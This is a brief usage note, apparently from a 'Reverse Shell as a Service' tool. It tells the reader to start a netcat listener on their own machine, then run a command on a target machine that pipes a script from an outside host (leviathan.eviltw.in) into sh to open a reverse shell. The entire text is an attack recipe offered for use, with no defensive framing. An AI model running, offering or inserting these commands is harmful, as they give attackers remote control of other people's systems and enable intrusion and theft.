# Reverse Shell as a Service # 1. On your machine: # nc -lvp 666 # # 2. On the target machine: # curl https://leviathan.eviltw.in/host:port | sh